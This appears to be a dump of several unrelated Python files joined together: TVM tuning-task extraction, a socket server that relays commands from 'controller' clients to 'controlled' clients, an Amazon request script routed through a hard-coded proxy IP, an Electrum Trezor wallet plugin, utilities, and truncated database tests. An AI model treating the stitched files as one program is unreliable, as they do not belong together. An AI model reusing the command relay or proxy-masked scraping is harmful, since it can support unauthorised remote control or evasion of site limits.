# to you under the Apache License, Version 2.0 (the
# "License"); you may not use this file except in compliance
# with the License. You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing,
# software distributed under the License is distributed on an
# "AS IS" BASIS, WITHOUT WARRANTIES OR CONDITIONS OF ANY
# KIND, either express or implied. See the License for the
# specific language governing permissions and limitations
# under the License.
# pylint: disable=unused-variable,invalid-name, not-context-manager
"""
Decorator and utilities for the integration with TOPI and Relay
99.9% copy-paste of implementation by @MerryMercy
"""
import threading
import logging
import tvm
from tvm.autotvm.task.dispatcher import DispatchContext, FallbackContext
from tvm.target import Target
from .task import create
from .topi_integration import TaskExtractEnv
logger = logging.getLogger("autotvm")
# TODO(moreau89) find a more elegant way to lower for VTAs
def _lower(mod, target, params):
"""Helper to lower VTA properly."""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm.relay.backend import graph_executor_codegen
if hasattr(target, "device_name") and target.device_name == "vta":
import vta
with vta.build_config(opt_level=3, disabled_pass={"AlterOpLayout"}):
mod, _ = relay.optimize(mod, target, params)
grc = graph_executor_codegen.GraphExecutorCodegen(None, target)
grc.codegen(mod["main"])
return
compiler = relay.vm.VMCompiler()
if params:
compiler.set_params(params)
compiler.lower(mod, target=target)
def extract_from_program(mod, params, target, target_host=None, ops=None):
"""Extract tuning tasks from a relay program.
This function is the single program version of extract_from_multiple_program.
Parameters
----------
mod: tvm.IRModule or relay.function.Function
The module or function to tune
params: dict of str to numpy array
The associated parameters of the program
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
target, target_host = Target.check_and_update_host_consist(target, target_host)
return extract_from_multiple_program([mod], [params], target, ops=ops)
def extract_from_multiple_program(mods, params, target, target_host=None, ops=None):
"""Extract tuning tasks from multiple relay programs.
This function collects tuning tasks by building a list of programs
with a "tracing" target and tracing all the calls to topi.
Parameters
----------
mods: List[tvm.IRModule] or List[relay.function.Function]
The list of modules or functions to tune
params: List of dict of str to numpy array
The associated parameters of the programs
target: tvm.target.Target
The compilation target
target_host: tvm.target.Target
The host compilation target
ops: List[tvm.ir.Op] or None
List of relay ops to be tuned. If not specified, all tunable ops will be extracted.
Returns
-------
task: Array of autotvm.task.Task
collected tasks
"""
# pylint: disable=import-outside-toplevel
from tvm import relay
from tvm import topi
env = TaskExtractEnv.get()
# merge target and target host
target, target_host = Target.check_and_update_host_consist(target, target_host)
# run compiler to collect all TOPI calls during compilation
env.reset(ops)
with env:
# disable logger temporarily
old_state = logger.disabled
logger.disabled = True
for mod, param in zip(mods, params):
if isinstance(mod, relay.function.Function):
mod = tvm.IRModule.from_expr(mod)
assert isinstance(
mod, tvm.IRModule
), "only support relay Module or Function to be tuned"
relay.backend.te_compiler.get().clear()
# wrap build call in thread to avoid multiprocessing problems
build_thread = threading.Thread(target=_lower, args=(mod, target, param))
build_thread.start()
build_thread.join()
relay.backend.te_compiler.get().clear()
# Clear the warning message cache in FallbackContext
if isinstance(DispatchContext.current, FallbackContext):
DispatchContext.current.memory = {}
DispatchContext.warning_messages = set()
logger.disabled = old_state
# create tasks for target
tasks = []
for task_name, args in env.get_tasks():
try:
tsk = create(task_name, args, target=target)
tasks.append(tsk)
except topi.InvalidShapeError:
logger.warning("Invalid shape during AutoTVM task creation")
return tasks
|
server.py
|
import socket
import threading
import classes
import modules.generate as generator
PORT = 5000
valid_codes = []
rooms = []
def client_listener(conn, addr):
"""
Listens to clients and responds to requests
Args:
conn (socket.socket): the client connection
addr (tuple): where the connection is from
"""
print(f"connection from {addr}")
controller = False
control = conn.recv(4096).decode("utf-8")
new_room = conn.recv(4096).decode("utf-8")
room = None
if (control == "y") or (control == "Y"):
controller = True
conn.send("T".encode())
else:
conn.send("F".encode())
user = classes.client.Client(not controller, conn)
if (new_room == "y") or (new_room == "Y"):
code = generator.generate_code(8)
while code in valid_codes:
code = generator.generate_code(8)
valid_codes.append(code)
conn.send(code.encode())
room = classes.room.Room(code)
rooms.append(room)
if user.is_controlled():
room.add_controlled(user)
else:
room.add_controller(user)
else:
conn.send("code req".encode())
code = conn.recv(4096).decode("utf-8")
while not code in valid_codes:
conn.send("wrong".encode())
code = conn.recv(4096).decode("utf-8")
conn.send("correct".encode())
for r in rooms:
if r.check_room_code(code):
room = r
if user.is_controlled():
room.add_controlled(user)
else:
room.add_controller(user)
running = True
while running:
msg = conn.recv(4096).decode()
cmd = conn.recv(4096).decode()
print(msg, cmd)
if msg == "disconnect":
running = False
else:
if not user.is_controlled():
targets = room.controlled
for target in targets:
target.send(msg)
target.send(cmd)
conn.close()
def main():
"""
main function
"""
with socket.socket(socket.AF_INET, socket.SOCK_STREAM) as sock:
sock.bind(("127.0.0.1", 5000))
sock.listen()
while True:
conn, addr = sock.accept()
threading.Thread(target=client_listener, args=(conn, addr)).start()
if __name__ == "__main__":
main()
|
process.py
|
import multiprocessing as mp
import random
import string
import requests
import time
random.seed(123)
# Define an output queue
output = mp.Queue()
# define a example function
def rand_string(length, output):
proxies = { 'http': '83.149.70.159:13012', 'https': '83.149.70.159:13012'}
r = requests.get('https://www.amazon.com/s/ref=nb_sb_noss?url=search-alias%3Dbaby-products&field-keywords=B00MRZIGVG', proxies=proxies)
output.put(r.status_code)
# Setup a list of processes that we want to run
processes = [mp.Process(target=rand_string, args=(5, output)) for x in range(4)]
s2 = time.time()
# Run processes
for p in processes:
p.start()
# Exit the completed processes
for p in processes:
p.join()
# Get process results from the output queue
results = [output.get() for p in processes]
s = time.time()
print s - s2
print(results)
|
plugin.py
|
import threading
from binascii import hexlify, unhexlify
from qtum_electrum.util import bfh, bh2u
from qtum_electrum.bitcoin import (b58_address_to_hash160, xpub_from_pubkey,
TYPE_ADDRESS, TYPE_SCRIPT, NetworkConstants)
from qtum_electrum.i18n import _
from qtum_electrum.plugins import BasePlugin
from qtum_electrum.transaction import deserialize
from qtum_electrum.keystore import Hardware_KeyStore, is_xpubkey, parse_xpubkey
from ..hw_wallet import HW_PluginBase
# TREZOR initialization methods
TIM_NEW, TIM_RECOVER, TIM_MNEMONIC, TIM_PRIVKEY = range(0, 4)
# script "generation"
SCRIPT_GEN_LEGACY, SCRIPT_GEN_P2SH_SEGWIT, SCRIPT_GEN_NATIVE_SEGWIT = range(0, 3)
class TrezorCompatibleKeyStore(Hardware_KeyStore):
def get_derivation(self):
return self.derivation
def get_script_gen(self):
def is_p2sh_segwit():
return self.derivation.startswith("m/49'/")
def is_native_segwit():
return self.derivation.startswith("m/84'/")
if is_native_segwit():
return SCRIPT_GEN_NATIVE_SEGWIT
elif is_p2sh_segwit():
return SCRIPT_GEN_P2SH_SEGWIT
else:
return SCRIPT_GEN_LEGACY
def get_client(self, force_pair=True):
return self.plugin.get_client(self, force_pair)
def decrypt_message(self, sequence, message, password):
raise RuntimeError(_('Encryption and decryption are not implemented by %s') % self.device)
def sign_message(self, sequence, message, password):
client = self.get_client()
address_path = self.get_derivation() + "/%d/%d"%sequence
address_n = client.expand_path(address_path)
msg_sig = client.sign_message(self.plugin.get_coin_name(), address_n, message)
return msg_sig.signature
def sign_transaction(self, tx, password):
if tx.is_complete():
return
# previous transactions used as inputs
prev_tx = {}
# path of the xpubs that are involved
xpub_path = {}
for txin in tx.inputs():
pubkeys, x_pubkeys = tx.get_sorted_pubkeys(txin)
tx_hash = txin['prevout_hash']
prev_tx[tx_hash] = txin['prev_tx']
for x_pubkey in x_pubkeys:
if not is_xpubkey(x_pubkey):
continue
xpub, s = parse_xpubkey(x_pubkey)
if xpub == self.get_master_public_key():
xpub_path[xpub] = self.get_derivation()
self.plugin.sign_transaction(self, tx, prev_tx, xpub_path)
class TrezorCompatiblePlugin(HW_PluginBase):
# Derived classes provide:
#
# class-static variables: client_class, firmware_URL, handler_class,
# libraries_available, libraries_URL, minimum_firmware,
# wallet_class, ckd_public, types, HidTransport
MAX_LABEL_LEN = 32
def __init__(self, parent, config, name):
HW_PluginBase.__init__(self, parent, config, name)
self.main_thread = threading.current_thread()
# FIXME: move to base class when Ledger is fixed
if self.libraries_available:
self.device_manager().register_devices(self.DEVICE_IDS)
def _try_hid(self, device):
self.print_error("Trying to connect over USB...")
try:
return self.hid_transport(device)
except BaseException as e:
# see fdb810ba622dc7dbe1259cbafb5b28e19d2ab114
# raise
self.print_error("cannot connect at", device.path, str(e))
return None
def _try_bridge(self, device):
self.print_error("Trying to connect over Trezor Bridge...")
try:
return self.bridge_transport({'path': hexlify(device.path)})
except BaseException as e:
self.print_error("cannot connect to bridge", str(e))
return None
def create_client(self, device, handler):
# disable bridge because it seems to never returns if keepkey is plugged
#transport = self._try_bridge(device) or self._try_hid(device)
transport = self._try_hid(device)
if not transport:
self.print_error("cannot connect to device")
return
self.print_error("connected to device at", device.path)
client = self.client_class(transport, handler, self)
# Try a ping for device sanity
try:
client.ping('t')
except BaseException as e:
self.print_error("ping failed", str(e))
return None
if not client.atleast_version(*self.minimum_firmware):
msg = (_('Outdated %s firmware for device labelled %s. Please '
'download the updated firmware from %s') %
(self.device, client.label(), self.firmware_URL))
self.print_error(msg)
handler.show_error(msg)
return None
return client
def get_client(self, keystore, force_pair=True):
devmgr = self.device_manager()
handler = keystore.handler
with devmgr.hid_lock:
client = devmgr.client_for_keystore(self, handler, keystore, force_pair)
# returns the client for a given keystore. can use xpub
if client:
client.used()
return client
def get_coin_name(self):
return "Testnet" if NetworkConstants.TESTNET else "Bitcoin"
def initialize_device(self, device_id, wizard, handler):
# Initialization method
msg = _("Choose how you want to initialize your %s.\n\n"
"The first two methods are secure as no secret information "
"is entered into your computer.\n\n"
"For the last two methods you input secrets on your keyboard "
"and upload them to your %s, and so you should "
"only do those on a computer you know to be trustworthy "
"and free of malware."
) % (self.device, self.device)
choices = [
# Must be short as QT doesn't word-wrap radio button text
(TIM_NEW, _("Let the device generate a completely new seed randomly")),
(TIM_RECOVER, _("Recover from a seed you have previously written down")),
(TIM_MNEMONIC, _("Upload a BIP39 mnemonic to generate the seed")),
(TIM_PRIVKEY, _("Upload a master private key"))
]
def f(method):
import threading
settings = self.request_trezor_init_settings(wizard, method, self.device)
t = threading.Thread(target = self._initialize_device, args=(settings, method, device_id, wizard, handler))
t.setDaemon(True)
t.start()
wizard.loop.exec_()
wizard.choice_dialog(title=_('Initialize Device'), message=msg, choices=choices, run_next=f)
def _initialize_device(self, settings, method, device_id, wizard, handler):
item, label, pin_protection, passphrase_protection = settings
if method == TIM_RECOVER:
# FIXME the PIN prompt will appear over this message
# which makes this unreadable
handler.show_error(_(
"You will be asked to enter 24 words regardless of your "
"seed's actual length. If you enter a word incorrectly or "
"misspell it, you cannot change it or go back - you will need "
"to start again from the beginning.\n\nSo please enter "
"the words carefully!"))
language = 'english'
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
if method == TIM_NEW:
strength = 64 * (item + 2) # 128, 192 or 256
u2f_counter = 0
skip_backup = False
client.reset_device(True, strength, passphrase_protection,
pin_protection, label, language,
u2f_counter, skip_backup)
elif method == TIM_RECOVER:
word_count = 6 * (item + 2) # 12, 18 or 24
client.step = 0
client.recovery_device(word_count, passphrase_protection,
pin_protection, label, language)
elif method == TIM_MNEMONIC:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_mnemonic(str(item), pin,
passphrase_protection,
label, language)
else:
pin = pin_protection # It's the pin, not a boolean
client.load_device_by_xprv(item, pin, passphrase_protection,
label, language)
wizard.loop.exit(0)
def setup_device(self, device_info, wizard, purpose):
'''Called when creating a new wallet. Select the device to use. If
the device is uninitialized, go through the intialization
process.'''
devmgr = self.device_manager()
device_id = device_info.device.id_
client = devmgr.client_by_id(device_id)
# fixme: we should use: client.handler = wizard
client.handler = self.create_handler(wizard)
if not device_info.initialized:
self.initialize_device(device_id, wizard, client.handler)
client.get_xpub('m', 'standard')
client.used()
def get_xpub(self, device_id, derivation, xtype, wizard):
devmgr = self.device_manager()
client = devmgr.client_by_id(device_id)
client.handler = wizard
xpub = client.get_xpub(derivation, xtype)
client.used()
return xpub
def sign_transaction(self, keystore, tx, prev_tx, xpub_path):
self.prev_tx = prev_tx
self.xpub_path = xpub_path
client = self.get_client(keystore)
inputs = self.tx_inputs(tx, True, keystore.get_script_gen())
outputs = self.tx_outputs(keystore.get_derivation(), tx, keystore.get_script_gen())
signed_tx = client.sign_tx(self.get_coin_name(), inputs, outputs, lock_time=tx.locktime)[1]
raw = bh2u(signed_tx)
tx.update_signatures(raw)
def show_address(self, wallet, address):
client = self.get_client(wallet.keystore)
if not client.atleast_version(1, 3):
wallet.keystore.handler.show_error(_("Your device firmware is too old"))
return
change, index = wallet.get_address_index(address)
derivation = wallet.keystore.derivation
address_path = "%s/%d/%d"%(derivation, change, index)
address_n = client.expand_path(address_path)
script_gen = wallet.keystore.get_script_gen()
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDADDRESS
client.get_address(self.get_coin_name(), address_n, True, script_type=script_type)
def tx_inputs(self, tx, for_sig=False, script_gen=SCRIPT_GEN_LEGACY):
inputs = []
for txin in tx.inputs():
txinputtype = self.types.TxInputType()
if txin['type'] == 'coinbase':
prev_hash = "\0"*32
prev_index = 0xffffffff # signed int -1
else:
if for_sig:
x_pubkeys = txin['x_pubkeys']
if len(x_pubkeys) == 1:
x_pubkey = x_pubkeys[0]
xpub, s = parse_xpubkey(x_pubkey)
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
txinputtype.script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
txinputtype.script_type = self.types.InputScriptType.SPENDADDRESS
else:
def f(x_pubkey):
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
else:
xpub = xpub_from_pubkey(0, bfh(x_pubkey))
s = []
node = self.ckd_public.deserialize(xpub)
return self.types.HDNodePathType(node=node, address_n=s)
pubkeys = list(map(f, x_pubkeys))
multisig = self.types.MultisigRedeemScriptType(
pubkeys=pubkeys,
signatures=list(map(lambda x: bfh(x)[:-1] if x else b'', txin.get('signatures'))),
m=txin.get('num_sig'),
)
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.InputScriptType.SPENDWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.InputScriptType.SPENDP2SHWITNESS
else:
script_type = self.types.InputScriptType.SPENDMULTISIG
txinputtype = self.types.TxInputType(
script_type=script_type,
multisig=multisig
)
# find which key is mine
for x_pubkey in x_pubkeys:
if is_xpubkey(x_pubkey):
xpub, s = parse_xpubkey(x_pubkey)
if xpub in self.xpub_path:
xpub_n = self.client_class.expand_path(self.xpub_path[xpub])
txinputtype._extend_address_n(xpub_n + s)
break
prev_hash = unhexlify(txin['prevout_hash'])
prev_index = txin['prevout_n']
if 'value' in txin:
txinputtype.amount = txin['value']
txinputtype.prev_hash = prev_hash
txinputtype.prev_index = prev_index
if 'scriptSig' in txin:
script_sig = bfh(txin['scriptSig'])
txinputtype.script_sig = script_sig
txinputtype.sequence = txin.get('sequence', 0xffffffff - 1)
inputs.append(txinputtype)
return inputs
def tx_outputs(self, derivation, tx, script_gen=SCRIPT_GEN_LEGACY):
outputs = []
has_change = False
for _type, address, amount in tx.outputs():
info = tx.output_info.get(address)
if info is not None and not has_change:
has_change = True # no more than one change address
index, xpubs, m = info
if len(xpubs) == 1:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOADDRESS
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index)
txoutputtype = self.types.TxOutputType(
amount = amount,
script_type = script_type,
address_n = address_n,
)
else:
if script_gen == SCRIPT_GEN_NATIVE_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOWITNESS
elif script_gen == SCRIPT_GEN_P2SH_SEGWIT:
script_type = self.types.OutputScriptType.PAYTOP2SHWITNESS
else:
script_type = self.types.OutputScriptType.PAYTOMULTISIG
address_n = self.client_class.expand_path("/%d/%d"%index)
nodes = map(self.ckd_public.deserialize, xpubs)
pubkeys = [ self.types.HDNodePathType(node=node, address_n=address_n) for node in nodes]
multisig = self.types.MultisigRedeemScriptType(
pubkeys = pubkeys,
signatures = [b''] * len(pubkeys),
m = m)
txoutputtype = self.types.TxOutputType(
multisig = multisig,
amount = amount,
address_n = self.client_class.expand_path(derivation + "/%d/%d"%index),
script_type = script_type)
else:
txoutputtype = self.types.TxOutputType()
txoutputtype.amount = amount
if _type == TYPE_SCRIPT:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOOPRETURN
txoutputtype.op_return_data = address[2:]
elif _type == TYPE_ADDRESS:
txoutputtype.script_type = self.types.OutputScriptType.PAYTOADDRESS
txoutputtype.address = address
outputs.append(txoutputtype)
return outputs
def electrum_tx_to_txtype(self, tx):
t = self.types.TransactionType()
d = deserialize(tx.raw)
t.version = d['version']
t.lock_time = d['lockTime']
inputs = self.tx_inputs(tx)
t._extend_inputs(inputs)
for vout in d['outputs']:
o = t._add_bin_outputs()
o.amount = vout['value']
o.script_pubkey = bfh(vout['scriptPubKey'])
return t
# This function is called from the trezor libraries (via tx_api)
def get_tx(self, tx_hash):
tx = self.prev_tx[tx_hash]
return self.electrum_tx_to_txtype(tx)
|
utils.py
|
#!/usr/bin/env python
# -*- coding: UTF-8 -*-
from collections import OrderedDict
import uuid
import sys
import hashlib
import binascii
from functools import wraps
import os
import pwd
import os.path
try:
from urllib.parse import urlparse
except ImportError:
from urlparse import urlparse
if sys.version_info.major == 2:
import codecs
def str_to_bytes(value):
if isinstance(value, (bytes, bytearray)):
return bytes(value)
elif isinstance(value, unicode):
return codecs.encode(value, 'utf8')
else:
raise TypeError("require text, bytes, or bytearray")
def decode_hex(s):
if isinstance(s, bytearray):
s = str(s)
if not isinstance(s, (str, unicode)):
raise TypeError('require str or unicode')
return s.decode('hex')
def encode_hex(s):
if isinstance(s, bytearray):
s = str(s)
if not isinstance(s, (str, unicode)):
raise TypeError('require instance of str or unicode')
return s.encode('hex')
else:
def str_to_bytes(value):
if isinstance(value, bytearray):
value = bytes(value)
if isinstance(value, bytes):
return value
return bytes(value, 'utf-8')
def decode_hex(s):
if isinstance(s, str):
return bytes.fromhex(s)
if isinstance(s, (bytes, bytearray)):
return binascii.unhexlify(s)
raise TypeError('require instance of str or bytes')
def encode_hex(b):
if isinstance(b, str):
b = bytes(b, 'utf-8')
if isinstance(b, (bytes, bytearray)):
return str(binascii.hexlify(b), 'utf-8')
raise TypeError('require instance of str or bytes')
def to_string(value):
if value!=None:
if isinstance(value, (bytes, bytearray)):
value = value.decode()
else:
value = str(value)
return value
def to_bytes(value):
return str_to_bytes(value)
def is_int(i):
try:
assert not is_string(i)
i = int(i)
return True
except:
return False
def is_string(s):
try:
return isinstance(s, basestring)
except NameError:
return isinstance(s, str)
def generateuid():
return uuid.uuid4().hex
def md5(txt):
assert txt
txt = to_bytes(txt)
return hashlib.md5(txt).hexdigest()
def coroutine(func):
def _(*args,**kwargs):
cr = func(*args,**kwargs)
next(cr)
return cr
return _
def thread(func):
from threading import Thread
@wraps(func)
def _(*args, **kwargs):
t = Thread(target = func, args = args, kwargs = kwargs)
t.daemon = True
t.start()
return t
return _
def process(func):
from multiprocessing import Process
@wraps(func)
def _(*args, **kwargs):
p = Process(target = func, args = args, kwargs = kwargs)
p.start()
return p
return _
|
test_tsdb.py
|
import unittest
import multiprocessing
import time
from timeseries import TimeSeries
from tsdb.persistentdb import PersistentDB
from tsdb.tsdb_client import *
from tsdb.tsdb_server import TSDBServer
from tsdb.tsdb_error import *
import numpy as np
from scipy.stats import norm
schema = {
'pk': {'type': str, 'index': None}, #will be indexed anyways
'ts': {'index': None},
'order': {'type': int, 'index': 1},
'mean': {'type': float, 'index': 1},
'std': {'type': float, 'index': 1},
'vp': {'type': bool, 'index': 1}
}
def tsmaker(m, s, j):
"returns metadata and a time series in the shape of a jittered normal"
t = np.arange(0.0, 1.0, 0.01)
v = norm.pdf(t, m, s) + j*np.random.randn(100)
return TimeSeries(t, v)
class MyTest(unittest.TestCase):
def test_badinput(self):
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':int}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, threshold='a')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 12, dbname='testdb', overwrite=True, threshold='a')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, wordlength='a')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, threshold=-10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, wordlength=-10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=-10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, wordlength=10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, tslen=300)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, tslen='256')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, tslen=8)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=10.5)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=10)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True, cardinality=128)
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', load='yes')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite='yes')
with self.assertRaises(ValueError):
db = PersistentDB(schema, 'pk', dbname=123, overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'DELETE':{'type':bool, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'mean:ie':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'mean':{'type':dict, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB([{'type':str, 'index':None}, {'type':float, 'index':1}], 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':int, 'index':None}, 'mean':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'd_vp-mean':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'vp':{'type':float, 'index':1}}, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db = PersistentDB({'pk':{'type':str, 'index':None}, 'vp':{'type':bool, 'index':1}}, 'mean', dbname='testdb', overwrite=True)
def test_db_tsinsert(self):
ts1 = TimeSeries([1,2,3],[4,5,6])
ts2 = TimeSeries([1,2,3],[4,5,6])
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
db.insert_ts('ts1', ts1)
with self.assertRaises(ValueError):
db.insert_ts('ts1', ts2)
with self.assertRaises(ValueError):
db.insert_ts('ts:1', ts2)
with self.assertRaises(ValueError):
db.insert_ts('ts1', [[1,2,3],[4,5,6]])
db.insert_ts('ts2', ts2)
db.insert_ts('ts3', ts2)
def test_db_upsertmeta(self):
ts1 = TimeSeries([1,2,3],[4,5,6])
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
with self.assertRaises(ValueError):
db.upsert_meta('ts1', {'mean':5})
db.insert_ts('ts1', ts1)
with self.assertRaises(ValueError):
db.upsert_meta('ts1', 'mean' == 5)
db.upsert_meta('ts1', {'mean':5})
def test_db_select(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
db.insert_ts('one', TimeSeries([1,2,3],[4,5,6]))
db.insert_ts('two', TimeSeries([7,8,9],[3,4,5]))
db.insert_ts('negone', TimeSeries([1,2,3],[-4,-5,-6]))
db.upsert_meta('one', {'order':3})
db.upsert_meta('one', {'order':1, 'mean':5})
db.upsert_meta('two', {'order':2, 'mean':4})
db.upsert_meta('negone', {'order':-1, 'mean':-5})
with self.assertRaises(ValueError):
db.select(meta=None, fields=None)
with self.assertRaises(ValueError):
db.select(meta=None, fields='mean')
pks, fields = db.select(meta={}, fields=None)
self.assertEqual(set(pks), set(['one', 'two', 'negone']))
self.assertEqual(len(fields[0]), 0)
pks, fields = db.select(meta={}, fields=[])
self.assertEqual(set(pks), set(['one', 'two', 'negone']))
self.assertEqual(fields[pks.index('one')]['order'], 1)
pks, fields = db.select(meta={'mean':5}, fields=None)
self.assertEqual(set(pks), set(['one']))
pks, fields = db.select(meta={'mean':{'<=':4}}, fields=None)
self.assertEqual(set(pks), set(['two', 'negone']))
pks, fields = db.select(meta={'mean':5}, fields=['order'])
self.assertEqual(fields[0]['order'], 1)
pks, fields = db.select(meta={}, fields=None, additional={'sort_by':'+order'})
self.assertEqual(pks, ['negone', 'one', 'two'])
pks, fields = db.select(meta={}, fields=None, additional={'sort_by':'-order'})
self.assertEqual(pks, ['two', 'one', 'negone'])
pks, fields = db.select(meta={}, fields=None, additional={'sort_by':'-order', 'limit':2})
self.assertEqual(pks, ['two', 'one'])
def test_simsearch(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
m = np.random.uniform(low=0.0, high=1.0)
s = np.random.uniform(low=0.05, high=0.4)
j = np.random.uniform(low=0.05, high=0.2)
query = tsmaker(m, s, j)
with self.assertRaises(ValueError): # No similarity search w/o vantage points
closest = db.simsearch(query)
for i in range(5):
db.add_vp()
closest = db.simsearch(query)
def test_simsearchSAX(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
m = np.random.uniform(low=0.0, high=1.0)
s = np.random.uniform(low=0.05, high=0.4)
j = np.random.uniform(low=0.05, high=0.2)
query = tsmaker(m, s, j)
closest = db.simsearch_SAX(query)
def test_trees(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
new_ts = tsmaker(m, s, j)
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
db.upsert_meta("ts-{}".format(i), {'mean':new_ts.mean(), 'std':new_ts.std()})
randi = set(np.random.randint(0,n_add, size=5))
for i in randi:
db.delete_ts("ts-{}".format(i))
pks, fields = db.select(meta={'mean':{'<=':0.5}, 'std':{'>':2}}, fields=['mean', 'std'])
for row in fields:
self.assertLessEqual(row['mean'], 0.5)
self.assertGreater(row['std'], 2)
def test_load_del(self):
db = PersistentDB(schema, 'pk', dbname='testdb', overwrite=True)
n_add = 50
mus = np.random.uniform(low=0.0, high=1.0, size=n_add)
sigs = np.random.uniform(low=0.05, high=0.4, size=n_add)
jits = np.random.uniform(low=0.05, high=0.2, size=n_add)
saveinfo = {}
for i, m, s, j in zip(range(n_add), mus, sigs, jits):
new_ts = tsmaker(m, s, j)
db.insert_ts("ts-{}".format(i), tsmaker(m, s, j))
db.upsert_meta("ts-{}".format(i), {'mean':new_ts.mean(), 'std':new_ts.std()})
saveinfo["ts-{}".format(i)] = new_ts.mean()
db.add_vp("ts-4")
db.add_vp()
db.delete_ts("ts-4")
pks, fields = db.select(meta={'vp':True}, fields=None)
self.assertEqual(len(pks),1)
newdb = PersistentDB(schema, 'pk', dbname='testdb', load=True)
pks, fields = db.select(meta={}, fields=['mean'])
self.assertEqual(len(pks), n_add-1)
self.assertTrue("ts-4" not in pks)
for i in range(0,n_add-1):
self.assertEqual(fields[i]['mean'], saveinfo[pks[i]])
############## TEST WORKS ON LOCAL MACHINE BUT NOT IN TRAVIS #################################
#def test_client_ops(self):
# schema["d_t3"] = {'convert': float, 'index': 1}
# db = DictDB(schema, 'pk')
# server = TSDBServer(db)
# def tests(self,t):
# client = TSDBClient()
